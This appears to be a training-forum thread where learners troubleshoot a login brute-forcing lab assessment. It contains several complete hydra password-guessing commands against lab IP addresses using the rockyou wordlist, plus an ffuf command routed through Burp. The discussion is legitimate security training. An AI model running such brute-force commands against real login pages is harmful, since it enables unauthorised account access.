Login Brute Forcing Skills Assessment

Hello again, stuck on the brute forcing module again, the question is: “Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?”

I know the username is User so I used this

hydra -l user -P /usr/share/wordlists/rockyou.txt -f 94.237.59.206 -s 48254 http-post-form “/admin_login.php:username=^USER^&password=^PASS^:F=<form name=‘login’”

and I got the results of User:123456
I’ve tried varying my priorly stated lines & got the same results yet I can’t login to the site to fetch the flag for those credentials. What am I missing? I’ve read and re-read the module

Hey! No worries. Make sure you inspect a test login with Burpsuite or Developer Tools. Your parameters are wrong. Also take another look at the page html because your fail string has a slight mistake.

Let me know if you have any troubles.

First off, thank you for your repeated help. You are a legend.
Secondly-- I still am having a lot of trouble. I’ve sifted through the “Determine Login Parameters” section multiple times and I came up with

hydra -l user -P /usr/share/wordlists/rockyou.txt -f 94.237.62.195 -s 54773 http-post-form “/admin_login.php:username=^USER^&password=^PASS^:F=<form name=‘log-in’”

which is slightly different but again yields the same results as last time. What confuses me about the module is if you’re always burping with the credentials “Admin:admin” wouldn’t the string always be “username=^USER^&password=^PASS^:F” and as far as the form name, the only option that makes sense to me is ‘admin_login’

I am so desperately lost & confused. This part is making no sense to me I have no idea what parameters to use if not those ones.

Hey dude, no worries.

So the burping piece is to see what the parameters are. Try this, launch burpsuite, turn intercept on, then try to login with test:test as credentials. When you catch the request in burpsuite. Look at the parameters, you should see user=test&.... try it out.

username=^USER^&password=^PASS^:F=<form name=‘log-in’”
Your fail sting looks perfect!!! Its now just the parameters.

Parameters are just what the admin_login.php file expects. And actually they are usually built into the HTML of the webform itself. It could be named anything, it could be id=test&pass=password. So that should answer your question that the form wouldn’t always be “username=^USER^&password=^PASS^.

Keep me posted if you have anymore issues understanding this. I will try to explain it further if needed. Or show screenshots of what I mean.

3 Likes

so I got burp to say “user=test&pass=test” on line 18 and I crafted a new command, which still seems to not work. I misunderstood, I suppose and thought it would look like this.

hydra -l user -P /usr/share/wordlists/rockyou.txt -f 94.237.62.195 -s 55240 http-post-form “/admin_login.php:user=^USER^&pass=^PASS^:F=<form name=‘log-in’”

so there HAVE been some changes made but something about the parameters isnt making sense. I don’t want the answer! Im getting closer but a little more information would be appreciated. This has had me stumped awhile. I appreciate your patience.

1 Like

NEVERMIND! I got it to work, you are a genius, thanks.

1 Like

Nooooo worries!!! Glad you got it. Sorry I wasn’t available to help you in the moment.

1 Like

it’s all good, i’m on a M-F schedule anyway :stuck_out_tongue: ! Unfortunately now on the next portion of the assessment, the IP address isn’t connecting to the website or pinging the server & I think i broke something on the infrastructure.

Hello, how could you do it?

I feel like I have all the parameters right but I still can’t.

hydra -l user -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou-10.txt -f 94.237.62.49 -s 48599 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"

I don’t know if it’s a dictionary error or something like that, I’ve tried with username dictionaries but it doesn’t work :frowning:

1 Like

I got the right answer but still server was not giving me the flag.
I tried 1 work around to get my flag.

intercept the request on burp → copy the request to file.
execute this command

ffuf -request admin_login.req -request-proto http -w /usr/share/wordlists/rockyou.txt -fs 422 -x http://localhost:8080
all the request will go through the burp and you can see the flag there too.
it might just work for other people too if server is not giving the flag even after getting the password from hydra.

1 Like

You are on the right path. Try a different rock you text Good luck :sunglasses:

also stuck on this question for a few hours now… and losing patience :hot_face:
“Once you access the login page, you are tasked to brute force your way into this page as well. What is the flag hidden inside?”

good luck to others being stuck here…

Edit: 5 mins after posted this msg managed to get it (also one of the reasons I posted in the first place to get me going…)
Couldn’t manage without reading all the helpful posts multiple times and trying out everything!
Good luck and thanks for the help!

please how did you pass this assessment? have use burp payloads have try the http-post-form
here is the command i used
hydra -l admin -P /usr/share/wordlists/rockyou.txt -f (targetip). -s port http-post-form “/admin_login.php:user=^USER^&pass=^PASS^:F<form name=‘log-in’” i don’t know why the password i got not working i also use burp same

im stuck did you ended up using the path /usr/share/wordlists/ or
/opt/useful/SecLists/Passwords/Leaked-Databases/ or opt/useful/SecLists/Passwords/Default-Credentials/ I have tried all the text files :(.

I had come across too many passwords and i tried them all but nada. Maybe the username is not admin?

I also tried using the parameter /admin_login.php but it does not work.

found it after 6hrs, it was a simple syntax error on the form name part. I also connected to htb-VPN in which idk if it helped or not. Check the cheatsheet. It helped a lot.

Not sure where you’re all getting the admin_login.php page or the fail string log-in because those are nowhere to be found. Even the exercise literally says to target the login.php page and the <form name='login' fail parameter which is in the burp and even browser response, and not log-in. Same for the parameters, they are username and password and not user and pass. I’m hella confused here

These are the things I tried (I even changed the rockyou wordlist to the most up to date one):

For some reason, after a reset, it decided to work :'(. The solution is literally the first screenshot…

I had not realized this is the skills assessment :smiley: